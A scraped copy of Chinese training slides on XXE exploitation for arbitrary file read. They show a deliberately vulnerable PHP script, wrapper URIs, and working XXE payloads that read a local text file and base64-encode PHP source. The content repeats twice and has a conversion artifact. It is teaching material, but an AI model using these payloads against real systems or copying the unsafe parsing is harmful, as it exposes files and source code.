【Web攻防】第四节 XXE漏洞利用 任意文件读取
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Web攻防 训练营
XXE漏洞利用 - 任意文件读取
课程内容
1. 测试代码介绍 2. php中测试POC
3. 读取文本文档 4. 读取PHP文件
01
测试代码介绍
测试代码介绍
<?php $xml=file_get_contents("php://input"); $data = simplexml_load_string($xml) ; echo "<pre>" ; print_r($data) ;//注释掉该语句即为无回显的情况 ?>
02
php中测试POC
pΒιβλιοθήκη Baidup中测试POC
file:///path/to/file.ext http://url/file.ext php://filter/read=convert.base64-encode/resource=conf.php
03
读取文本文档
有回显的XXE利用
Payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///c://test/flag.txt" >]> <value>&xxe;</value>
总结
1. 测试代码介绍 2. php中测试POC
3. 读取文本文档 4. 读取PHP文件
再见
欢迎关注 Web安全 训练营课程
04
读取PHP文件
读取PHP文件 直接利用file协议读取PHP文件会出现错误,那么需要使用base64编码来进行读取。
Payload:
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=test.php " >]> <value>&xxe;</value>
XXE漏洞利用 - 任意文件读取
课程内容
1. 测试代码介绍 2. php中测试POC
3. 读取文本文档 4. 读取PHP文件
01
测试代码介绍
测试代码介绍
<?php $xml=file_get_contents("php://input"); $data = simplexml_load_string($xml) ; echo "<pre>" ; print_r($data) ;//注释掉该语句即为无回显的情况 ?>
02
php中测试POC
pΒιβλιοθήκη Baidup中测试POC
file:///path/to/file.ext http://url/file.ext php://filter/read=convert.base64-encode/resource=conf.php
03
读取文本文档
有回显的XXE利用
Payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///c://test/flag.txt" >]> <value>&xxe;</value>
总结
1. 测试代码介绍 2. php中测试POC
3. 读取文本文档 4. 读取PHP文件
再见
欢迎关注 Web安全 训练营课程
04
读取PHP文件
读取PHP文件 直接利用file协议读取PHP文件会出现错误,那么需要使用base64编码来进行读取。
Payload:
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=test.php " >]> <value>&xxe;</value>